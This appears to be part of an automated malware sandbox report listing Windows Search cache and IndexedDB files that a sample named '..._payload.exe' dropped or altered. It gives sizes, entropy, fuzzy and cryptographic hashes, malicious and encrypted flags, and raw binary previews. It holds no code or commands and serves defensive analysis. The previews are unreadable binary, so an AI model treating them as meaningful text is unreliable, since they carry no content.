                                                                                                      Preview:./..........n..e...........8..K]......J..d.~...n|..N....i'..!9K....J..VT..Z.st...z...T.O.#(.%Q..[..@...%....z7...4._.n .q..w]..B....w...+...d......w.....`w.......`.../.@...S ..3.....y.i.2.....f..T,..8.7...-...Q/.0k....ta..l..^.x{.M...3u`!8t8.#[A..-V......|I0..Eg".@......U.2P./j...)t..\.....a...3X.~.@..,x.Q5....l.zo.^V,.F7...q..v#...3......@..y.(v.......F.%.}./....$..2~J..b..7_..cKZ.K.7<....P|.J..uQ.".....y...CU.=}.'.I...]6...P...?X..Ga...%..>.......Y..>.rZ.........\.....<.9$jz-.2.....{.....r.D.....sw../<.t....0r..MU?.....\8.W ...c..%...<..U..(.T~...&..]v....TCQ...]..m/..Q>-...h..e..6}..........{..m..+.8.83.UA);i.x...UR.d...~....?%,....J.U...:j...91..[.#.k..Xe!.:.yCS.spMN4.=aG9y:.8X..&.~.7.;._|_..3"W....m..f.S.`..P."..K...+Y.o.M.[......k.b....9.SE-Z..}%}./..f2.6.o...~TS.\..c...d3A.+.`ck4......4.K.j.S...u.s_...w|'.q.W...*.......y....;.C...1(..v.,.b.zZv...J..}....N9..y&..hS6. YGK.u=.;.j...gt_#j"o9xz[..a.S...-...=q.L7...0FW..I+$|j..vj#

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.98955385279912
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Bv5RV+T48f0KVYpt9uGNrndWXJ759VuZqZOWMgzEwKoTbPwDA2:zRGvdVYpLZndWXZVuZqN1M2wDA2
                                                                                                      MD5:931B36B1EE49A345E359542B0254FF74
                                                                                                      SHA1:8D5EEA04468FB0371482703DFA2DC032E5679A48
                                                                                                      SHA-256:85D93F1EFD8ACAED6E89C489781A3921FDD5E946FBB87773FA529AB0B477830B
                                                                                                      SHA-512:6BAC954E3235D761EFE5B6296EE78881A5D62A5E4B3E7C71F3BC731E2858E327FEA79C83F6DD2561CA710D3A42149C7EDF0655D97CC5A9F6D4CD678E92CA5D50
                                                                                                      Malicious:false
                                                                                                      Preview:@.v...^..Y....Z...lP.i..Rx.....2=6M......~u.....g....C....N."..t.lo/..t_.E.....Z.b......g69y......b{.....%.....=..w ..._.c.8.<.]....p.9.L.;.n..$R..6.. ...Pa...1J...b$z.......m?.f.!*....V..q!..&..P.......vtc..`R.wY....H..Z.O..0.x.g..&....;sB6../2.,..'..J.....*.}.ua\.. ..o{gzp..q..d.mm.#s....._..)..d.....MQ..E=....K...Fr..t..R5{.\.".._.).,.0...@..^.#..0q..a..6.W-_..Z!V..].......c_..s...Iu...<.h.f"r....!%M.2..l.&..l!#..?.{P..d..s..f..D...J..[.:..:/.1}A.q..1...-...'B<.....IW.7....{..|.C..H&.Tv.gX....;v#........%!.4Y.`.S..m...`.X.o..Y]..6..t...u.d2..9N/....N.*......$.0.na.'T.,G.Q......p.2.?j..L$..b....-&...'v.'.]A..no..Yow=!.C.....M<)VI..Z[3..R[s...8gu...-B...(..+.*B+...:].(.8..f.d....1..|*v.z]..a.r..=/.).....I!.81\.[.d.^..?..t.$x^....<..../.u>yv,.......F...._..z....[..g.3....4.G.D\y.N_....o$........W........6..{..kw~.!..:~.w...U.Aa........{SP.\...t..W.)..l.R...K......~..R.....=O..e.Y.6...:.?.r.o..Q..y...t."...s...`.u.Pr.q_...V.v....'

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2097486
                                                                                                      Entropy (8bit):1.1133071907345315
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:33euY1CWMn2QIlf2bX8neDIxnUtbxihB5kQZLoAJAS3k7qnxIrYaxDfax7e:+uY17M2Q58neDIePW+A3AS3Aqn6Pse
                                                                                                      MD5:1FA518F98DF69529E1468FF14A3B687B
                                                                                                      SHA1:E09CA9CD14DB9AA35CB5230F080501D639172069
                                                                                                      SHA-256:8F137E8934812046F236B14EDC5FD6B2D0DE5726347DA61D1E79CB2730D59927
                                                                                                      SHA-512:960DDA4F04AC54AADCDA49DCE0E8A5E14A80F88AF929EC1DB479DDD507B0A6278FF25F0F3C0CC2BF7B75EA0AF6AF876A79B2362F056B3E809CA68B9B9A00BD42
                                                                                                      Malicious:false
                                                                                                      Preview:.....7.[...$U...7.c.go...'&_.B..j........ZP.......X..e=F.0).GLOI..P'.t{..r......&..2..I..o._.1@3.?(..NU...&..#....X..z....ebrBi..{....7~G...} >..J^..f..)....El...N*...g..QS./]..s>.o3..S@.:...Kk......GA..}.RQ..dlm(G.?..-Z...pRS.GT............1<.T...`*.`.....\..;.|..q...'..G.3...q..z..N.7P^..]!...Q'......Z.t.q....>..H$...x..X'....>0.y.^k....s.Q.n...9..3....T..`...}.....V..._QB.@.5=..{L] Q...\..y'.?.R.....^...i..;H. .B.{B....y.J';.7+V.N.....Ct1..e.(."......=.....e-..OH.Cds...)..L0...oI....I8.WU...K...!.......;...x......e..W..z/....!.6F.....K.....@6jNc.,..;..StG.Ox:.....}|=.........{YG...............U.......:..y.j......:V.K).....$...^....6)._r.p}....!E.K.t..............m....@.*T.-...\Mu..G.......B.7?0....~.....^.......q......F7..d.y.+w...'...6....7.)....!*....;..:.D[).%.+q._..kn!WH.;.)..y..B/.gb.Xt.-....(S.......m%O.......%yH......3.....o..._.K..g.Y.T.6.q.....l3Z...4.UU.*....pF{..;N.,.....|..kvK..`..,..{.=\r....U.....'I......x%$p.......

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.98868913100529
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:HiwZZSdAqiC1vADGk/GTJ3jCV5UQFpP+UO/kc3DDhuTESSx:HZgdMC1vADaTJTCHv+vNDDhuT4x
                                                                                                      MD5:FF862E008D7E7AF18090E2F7D74F0993
                                                                                                      SHA1:238A344A511FBBC833620B18BA2260EF7D86428B
                                                                                                      SHA-256:EAE7A40BC8D9DBF70D01BBA599DE3CE7F29049CB3F7AB301C9890E58DE343280
                                                                                                      SHA-512:ADC4AA5E8F0E6C648E3ADB3974C7C3FD07EE51F6D688D254E17370C97F8B26C7A5DDBD4AB7CD468C1399C1713E04CD6347D43209815BA3B2E70FDABC9620EE4C
                                                                                                      Malicious:false
                                                                                                      Preview:..l.....z0ET.$.k.H...#.y=.06.E).P...`.@.e....}.k.{^.do=.i}..N....3.n..i."].W%..-c.o.m:}..3.$iI...T4.(.........:Dy.g..;R...3.....D...A.Ua.............Nx.c..Y....aE.....k...s..DZ............dN.'.L..3.....d..r..2.&.T.T`...^.J.).g.. .!..)...r'.P.?..+....N..O.J.330.....b.ZiN:....-E4.......])...W..K.............r.[.....P^....[&.......M...f..H...O..5...c..Jf..x.U..|...2G.B.U...y.......I.k...70.R.....$_.UN.>.......:..;.<....m.......6...j..w...g.uv{.&.....j.s..j.a4......P..b.rw..`.GA.7...&...'.B...aU.L..+_$tL+w..x..l...:...".{...1U't..e.Z."I..e....."j.}......o:.r....]\..L..O...... .OC.[.%r?n:.HU.9G.A......u.=.%..q..k.?.o.^....YJ...$*....=&.mf().".DB...x.=...TPl.>L..v*.2.....`e.....E.......\z.=.JV=8..w.<U.._...[..IEz!q..(.3...cX..h6j.]..y.5.*...=f.^.....Ky...2..l|S..Y!...?.}..E.2.V..+8....C.H`-.8..B.....|...........zJ];a.Q..*D2{..>....$..)/ut:.v...K#.4..+.L.Z.R...70..&2P.....r..]....dXb.H....V....J..T.W..D..<.(..LQJQ.l.]...F....XZ.~I..R.E.Z...?52..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.973639493714373
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:agSoFDOPxLOYAXKP6UzptT/t0wm/UpzMjqhoOSHki4Itj:aaDOEXKSeF0APeTZtj
                                                                                                      MD5:2829C98C5F4F7064B62537F02BAC5E4F
                                                                                                      SHA1:5B3D5CD37A333E054F2B30AFD030034983AB6E5F
                                                                                                      SHA-256:D35FF540DEB6783A981D9A79D984C79C8C8806EF8533B10F3AD42997FEADB373
                                                                                                      SHA-512:B567D2A97514AD28C697A1DF4DFB390D9113AD03FAE4A10EFCCE716AC8AC19B61A2D8AEFB0E4175DAA4B0F0C6B1C035B19E998E4AF7EE51DDAB488373492A1E2
                                                                                                      Malicious:false
                                                                                                      Preview:6....!-[..-..w....?F0#M.1VA..z@i$..HVsq.k5...%...0...<z7.{~...t..!...pa...C..1r.I..%...s...n...3.s.[*O(........4..D.].*..P.e.`..%.P.g.1........+.....*~.D.........&7."Z8.N5.....ZT.v0W...C.....q.J.c.......X.....].2....B..>...\-#...^..%....l8.(..r.q. ...\.~.w...xT...}{..c.}.-..Ni.v.L...".=F..).Z.@w.pQ...8.C.y.<..X.Q..J..x..O.;...B4b.e..%V.....d.a$lA...A\...........P..%...1\...b.eK#.3......'.D.*...,U..z..?..;FCb..'..D/\.....rg.M.vx*R.9.[..B .TpM.f....b...T.2.|f...Z..M/.1B.O...bS..F.....P....[.\..w.E...p.^:0I.H8..O..K......v...u..r...r.v|c..kj......<..%BBb.- RQq....>.9..Z.5..jw.... .k.W.0..<.v...&F..=._o^.....[[3.oIH....X6....%t...s..X..o.]f.....|mQg..(.BF..f.I.1.Z.p.....0fH.....62.R^b.R...>..a.p...........g...D.T.....h..N.p._%..b...x.&fr....G.H.j..lq....0...6_..H.8}.^....uU.s.I.... ..|!..WU.yy7.....oP.>./m..%..H.._.W.R... y.."k."o..Uj}.....1.V..K.......Q.r...V../g.,..j-........\p~..[.a-7.0.6...}&\mb........A.$..~.0)...H..\q?..TD.i4.e.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2081590417084462
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:U2sjWzjN6c7EVV58VqBWpyJDx2mrKmsNp30+dRdEQQVClSC1VQGuFJ/R1sNVPp:RsjyGN8VU23rndZBfuF1Xsd
                                                                                                      MD5:6E1A98D2CCFCA6D8B832F5D7E2F43C65
                                                                                                      SHA1:C892442A2BEA49AC8CE954D489EE774782AD8E46
                                                                                                      SHA-256:06129A93FE1BF0388B40AB65EDFCD7AC354B84419C386DF4C78074153D0A597D
                                                                                                      SHA-512:B11AD75FB4EEA7F62816F171FA954BA50CFFB93EF0DB176B17F5FF26831395B97479A03CAAF46D5E93E46F68F610D731E8A158C87C2E488CB492C217DC66D712
                                                                                                      Malicious:false
                                                                                                      Preview:u.,I....}...QW..V..G.y.b.2...5.yMa....1...*.........rE4.,4.%Z. ..u.F.Y.}D...U.z6XXT..[.O...|W...iK.|...M)....eQ{.(..F.{.Q.....x..F..i>s...{...,]...R.8..%~g.GV.K...J....08sDB.[.........C..*F.h...,..y......dOT.g.:i...$......aO..Q...!.l.\k....bw.LI....-%..:.........d...9. .(..Wo...V.#$.,Q.C.|e.&..O....~.;@.E...x...Z..o.96..X...^.z........zg.R.?.i...B.n}..z..E`.f...`a...E......K.{N......0\.k..r.K.s4..h.Z.#..Lq..>.N0bvtI..%.......c>.U!Vy........1....6...K^ ......._..*\......2..Y.^.....H..%....S.B.y..I+.'.x!u....S.:.V..r.C..ex.h...j,..10^.y(,?.....5..Y(.:1."e..Db..Lm.65.r)...x.W;...b.T.'p=....C...D....^......J... R.w.hL.nO(=.]..[....|?C^>JO.o...aX,....l)!..M?p...ac.r....k.\...o...O.(..Vs.Q..X....KY._...h~...5'S'. ..\.....$..:g.5..X.&K.....%...#...C.eS......E.r%..}.........."...l+.5.....\..y..+k..=h..&...&..Y...0....9\.G.t.>.&...-.=....l.._..G..b.~.{......C.`'@&....Z.M+O^32.>.{.....c#.w....\.....g..X..r.[....7...u.|....Ay?..{.......C.[.}.(

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb00001.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.5016907872375955
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:Rz1jn2ZXGVCT1p6XiU9mHwkpsd6DDKWl9AAdHO8aNcmul34F:/n2hGVCSxsAdGmAy
                                                                                                      MD5:4B07F64F1983AA6153FAD57E24871F2E
                                                                                                      SHA1:138631FDEFDB7CFBA3ADF1213E4E31888EF14F04
                                                                                                      SHA-256:897066CC5429A17E68A7D6EEE318F59E46F34A35072D324FA9CBDA8F6FE7446E
                                                                                                      SHA-512:C3C7AD1E9007B7D603CBC23AC8BFD6862792E208823495899B0AE3FE9AD17AB400AA1B2EB2189861165630FAE6114AFA1EDA309A6F342EDECD1F24DAEE8D03AD
                                                                                                      Malicious:false
                                                                                                      Preview:.........#..m..aByv.q.].....*.(........Wi..n......u2..G_C.&/..`<....9..[.Q..VG.........d/.`.B....gd..mX..a..4(.k6.f......v.6:9Y{..?.S.rV.U?xF.Lsy.D.s.e.;.f.....vRO.Cv..o.i..x........q.v`.B...bk..a..D.b.+p..^eW...:...WH..X.d....sG.U..x.L.K.f.......N........M...p...:......V."&..Dx......jH.."C........;........ {...5.2.).v..3...=....z..B0..8..C....$?G=..8....d8.%j..kG..5..S.^...M....K../.Ts... 9...q. ..n.E.*...C.6z.......aJ.R.I4.R...]k...7....w?.x.e.......xb.)9...Z....NS.q....gA./..w.e..'...:..Z......c........v"\\d..".N.[QL....".|...:...RXr~.pc.2....b9...m$.....,..&.....O..]..........5...........(lo+i.M..*.~R....Y..17'1...@....jg..f..........L.~..X.../kO._.@.q(E.r.8...,.$j(w...;U2WV..'.Y..[c....J..\.ckT.1}.@y........,....FE^....,B.c&....&.>...u..c.%jrD..w...0.J...z..(.F...$.0.\K.....x-...fy....w..8.....:...k2lp,.......p...=.m]>$)7b.;.u......HY+x..mbZ./u@...=h.6d..$.u....k.7..T..|..f.Y.MC..9{./......c...O.$./v......6s....=.....-.H*.....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2079233161773404
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:vevzhIhcCNxjGek4wuMFzXT4aBi73QCFf41JkV94hlm13mlYPQ03MLcR:GvzhPCWekrTFDAgig1+sho13gYPcI
                                                                                                      MD5:97522A5BA7C9FDD56C715EE8CBB27FE9
                                                                                                      SHA1:FC9C4EDDE21003F63C0545AE509C63442DC66A43
                                                                                                      SHA-256:650E3CB3CC2C612435FD603A1DA7421D01A13B0C5DB2BC9D7E2E3EA86D0142F6
                                                                                                      SHA-512:AE72054F1E3CBBC99EFCB3E52B797B245F1867D2F2CF220EDC5CA79AFFCEEF3318161B61D7DCE91912372043D558137643F4751B96C7F97D9B6FD0B09B49C04A
                                                                                                      Malicious:false
                                                                                                      Preview:.....6.,..4.zW.X.0L4.!.l.>|.E=.Bj......0..o....=..;.E.b..v.FWW...Y.....$.-...%..;7...l.....S...i-6.<f..z.....4..A..M.D.N?.h..r9i.y.^.!1.....zl...7....$.0...P......,..r.*;..c..GA.2....?c.Hz.Q..K..x..../...3L.......0D..+...%.u1.QLb?...c}.q..O.=.29...e5s..{q....^.x-.../W.....7_bf.q.C...+k...C....A..c=H..U....~.q..k..Dk............M..~f.....M...G.P..oe.. ..s...,9.+kL.....x...._....%B............v.a..q....!9^h..~a.Fl........b....0O^^.!W..3'.....#?.D_....K..x..t......Aay7....sJU<W.Q...!.....6.2.([`n1oU/.^5.M..u.a..x...=.....[.....=:*.M.Z..n..-.5&..0...|`.F..u..6!F..z."".~FPw....*>.D..C.jU.S...A...b.j......D...KFU.i1S....8y..`..._&.$w..9.-..<.#.6{.L0..|y...#8.Y........k+3.m..%L.p...a.....r?.....p.!7.).QB.U@.....4....d....F.Y....6........$.M..B.v..!...p..)....Q..n4.y=.zP W...l..y.2.Z..Q.E...f..2..:...F....`|w....cK...d.^.........bo.....J.....b....u.i......L.c.N"D.#.V}Y.0..1...I..K,..N>.4....p.]..-..>...&..Zkk.P.2.}.(U..-.-.....7....n.N....3iB<...

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2078395510472744
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:WaAaVY/QhHHcmFj319vv1Plmfs+yhtRjs0RUcHT9JHPJwY2LH:SaVjHH5bvv1PQs+YXQ0RJz3HPOY2LH
                                                                                                      MD5:8A3F4B1BDFC8A578D501EBF517C89295
                                                                                                      SHA1:4C7FBA581B681F8421E6CFD354F0F5FE2875484A
                                                                                                      SHA-256:36498129FBBDC146E2AA57EDDADB79E77FC8BDC599E0F3895905020F2BAC6FE4
                                                                                                      SHA-512:6F1D0CE5810EDE352A633EB17DA2A8C685275720975DF8B9BC2A4C695F4FFC63CA227BA5AB04279F3BC35844C3EA2F616201ED6D7E6AECC910CDAE6A6E9C6E95
                                                                                                      Malicious:false
                                                                                                      Preview:.....QO....1.I....%..6.u>.u`....0.y.)..Y....P.y.U[]....kk.....L....e_......(..w....w..}.&7O.`.)....*...4.@.d....p$..V.s.....!%J..R.;....M..},.?.V.$../...s....s...ZfF..$f*u......V..ms@...N...ap...A2..B.../..I..N..%.DZ....A.7Nc.....!.[...). .<r.{.!..z.t.AS...$...<...q.a.....j.)(I'..<;.<........\.0[.a....YW... ...C...B..#...L0...r#..D..9......D9..k..tI..........B.u|..4..r...lC.<..5...H|....A.T.....5a]r........M..._.....lp....i5Af...P..#)*D..8....."..o..X.;.:.s..S%...]..?l.L".a..&....j....p#.7.........3.......[.."......8.*..<PA..F....d.j...K@...i1Z...q.3.e6...6.R.8.a/'..:.b..dN ?n.CM...5%}...t.rU.S9~.4...,..|..I...^u.$#..c:`B....*"....5./4....!Bp..^.H.:.e0.c_.OO...a.<...E......4.G.R.,h....d.Mv.$Q.....+...y.hv.....Pe=.....a.x..GNE~V[..auPgc1.....ibxbaw..=.p.F)....(.....`.2.fH.......v.5".d.o+........%.y[c$Z.....n..(.{Y?.c3C.W.XG.."...(..x.<T.A.&..B....P.<|#o.+.GN..&@...>..edq...C....8.b"....'...o"...s.9'/dl...!M.j4._~(....v.........."..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2082385413877677
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:qMuRTo3qHsfc/dXFuZ1rptWtTv7Pyhc3VTBWqdDpix51gi1CSM41B:qjR83qMokZ1rzWtTv76e3VIKYxwi1r7
                                                                                                      MD5:A899DE32112B92C21DE270496756ED08
                                                                                                      SHA1:EE13D0A4E2F013CEE6A29E771B78837732780C10
                                                                                                      SHA-256:78E6891F433E6057D9E6C2A97CBFB027E302CA380D4483B00A79D16AFDF45C22
                                                                                                      SHA-512:E239197250D3CD4A637C87C7CDBC611C5D2DB0EA6B59646B8A25126E8CD95D00A8753B2E04809EB531C8130CD65A401797EAF65DFDFBABC6CF2B6663468E5CCF
                                                                                                      Malicious:false
                                                                                                      Preview:...... .Q.......-O........@...p23.ya.NM.....`...%.n....c...j...z.Wg.q-"!..h.j.0..B......~u.O2B.Z....S.?.x......M..\...T.t.M.*.......&)....|.T...Z3&<X'..J..tR.R...y..RJw.Ja...d.s...Yn..k.[v....Q.5.F..@IS?RD..K.JE.x.CWg.. .\.....o..=....z..g..?....A[.H....6.[.;....c1..l.z........ &<...1...f.....E....KBvo........Y..... ..........p.U.Wh.x..$l..D@.....-..o..eq.P.y)g.s.C... MJ.14w`C.Kd.F..1.`q.;..+..]..:..T.t......?vB.....Zw].O.....`.P.o....em..F..m..Q..D.y.. .U.hA.t.,.Ag>..IL.y.......y{.zO..y,N.v...nK.....D*...,.]...D#.1.Z..Z..U.......].YG..H...jw.c'..h.......>.......xR.3.(8_ F..0..M.PY@..q...i.`.......v.H..v..-ou...h.V.f....t6.^H...h.....S.... O.H.M...Q./7...../....V.C..>.O.=....$.b...8e.....~..e...f.........,7.z.BR@Y.E......TK..z.h....bq.._.....f.....|.e.B........;$G.hK. .".P..*.6...(..O.#.R._.Q$.];}Zi[..D%s&a..9..m.fx..... .,,B.&.m;....J......~]..n]&../...'..9....z..&aJ.(...K.s......q...r..OU.,.^kM.5.U..T.Q.e.~_.v....[9....{cs.|RQ_...V..MP.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37788
                                                                                                      Entropy (8bit):7.995673222082611
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:O/4geQKOsoxjflPj+UUaHlDwcxtt66QKvnYF:O/4ROh9JL5FwqX66QK/YF
                                                                                                      MD5:8D614297D4AD5C62238DC8FBD3EAE2AB
                                                                                                      SHA1:6E284364EB2031919E909D2947444457E80C53B5
                                                                                                      SHA-256:236C3F7B0B606CCA6FE07818411A4FBB1E26D9BAD2648C892E1F1FF431366080
                                                                                                      SHA-512:E20312F75F8CC47BA1B2E09E62837085483EC9253E4DC0B489FF7029069C0AA8D2AF8B7019EB50ABC6DC7B1D4C58AEC1401AB6B9BC18B1DAA748B85E74EAA140
                                                                                                      Malicious:true
                                                                                                      Preview:0.0.....S..M][.....&...`.x.&.nR.[.G.....d.E.^.:...:...,..p72...WN....m(th..I.H..........Q..G...ch,)..x....$..,....Z]h.%^}.K..(..@...I...L.wf.a.C...F.=..Yc!...S..^XP=>@.h......o..e...1...Y....OYK& $.).Y...8eh!...Q..R..v..`.......<..3..rA.v...L..j}J6~QI;.gqU..2...l>.(...Yb......d...._:...cuC..a._-^.e..5.....).'..6..yS.EM9Q.^..+V..I..QA\4e3..'...>Hu......[.%.L.bWm.].U....h.H..<...|.g0.x.....e...(...H&t.;..I/3......o.}.'.w_...-S.6.>)G5.f....}.Q..R.+...C.\.?......).........P.+......6.=.N*...7.........4[..j.Z...v}.(.=dO....7."+....x]....;.....[.&}.D....g(k>....[w.O..<...n..t8s.5.l.....q..<.4...P?N.]T.v......,.w.../A.K?.".&.1q.....l4y.<.#..."OP.<...%.a....9<..Z3..@3.)..L.H....X.PC......0....E'..q..."..C.......n.....C.._.v\/.b.U.@`.&.@."P......Z.)!k...GG.B.C....\..d..d.....;........q[.u....4r/9.Z......C..6.QN.....(.(5.5\.g.^....*.../'..f}.*....#.l...Q.....E..T,/....s.bu.L.zp.....H.[8~E2s.....C....C.WV4.....k...{y..8$,......\.Xu.....T....?.&s.@.. ..z...A..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):50753
                                                                                                      Entropy (8bit):7.996456046473776
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:ObRYfxHZEAJpv+ul2a6fXpk5EH6Ao36U+LRQfKLk8M8VH98piUXtZJDLOBNFbG/:ObWpawpZJeQjcTM68piw7Nn/
                                                                                                      MD5:4312C6546178099757CFE29E603A1A12
                                                                                                      SHA1:E3CAE4902E94695EBDF65EF4A1F78534846F016E
                                                                                                      SHA-256:045334F81C22277E163139C5442F2EC25293D077208FB7F212D06D6AB5AB4B6C
                                                                                                      SHA-512:73E14235C496C8AEC0D083E2189F0409274E20AED435AB007E011C6B5A3C1D640ABB9A784B1CA7CD3A12FFE9AA7F623C67578366C37C971BDE73908C626E027D
                                                                                                      Malicious:true
                                                                                                      Preview:......7V....a......JfJ...d..T..?.X*.........;H.~..T^.....x]E.2.]m..D`5..Os..".G.).[m/K.h.kO~h).z...q.?.W...t..2..U...$)P....7a.9N.b]!,...'F..=?v...tn.0.... .`.Y..5.|.k..1...........16..r.....u.K.SyF.z.........R......*.S..[.......d..5.uy\1..w.....!..V">D.B.V.a92..m...s..4..dbr!..5B&).`..i.:..?gq............d..p.sd?B.D-...&n...)..u.2.o.Uw.C.|.\..t.N.h.[.n.4...v\......G..g........0.j.W...s......Q4p..~.. .0..Nkd......3NN........m.....C..U.....-.{L....h...I...<...U..3:.O...?d..........]._.......}..V/.$_)Q.....O;..4PC.fN..56.>&....it.KS...<.R..DZ.....e.....@....H..\..i..2....`...}._.^.M....L.._....]&.2.Q.a.SS.b..0..*;..m..l...y!.Lm..Q..k.......m.+S.hzv.....2.[.X.r.{6x....e..5h.?...%.<....U.d.....R...'r.?.....y>.p.a.8'.T...u..).E..D....B..Q\...{.....5.R.t.FY....p....=....K...?.:.cM.....d.......d...#I/.K.YE..k.A#^z....:...Y...l...$6!n.j.......nNm%.n..0...m...k..G*...9.c..AM(u!X....&....US...p."....p.._.<.O..Y..\..GJ>...04u...b).1...%.Y....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.index

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1126711
                                                                                                      Entropy (8bit):6.541448061744144
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:4c1Uy6RDr9gYfoyFxz8GfoLr7YfoyFxz8GHxUMO:4c1t8f1xz8GfMwf1xz8GRa
                                                                                                      MD5:3677277CC2BD1EE6EF65F500EDE9595C
                                                                                                      SHA1:AE548B624D7616679FB2BD92A2921EBC0E6CF0FF
                                                                                                      SHA-256:984426A74B2382878038BFE6079189221D9D977C3E0DF8E67E15D0DA23718AA5
                                                                                                      SHA-512:2A620D79A3D75D77EC4FAA02BE14D2BE74F8D0AB469C752D7779CA062EECA3287F0739257CD044693004DDDF041BB10268D2A50DE7B6998F7CE28269B36DB9ED
                                                                                                      Malicious:false
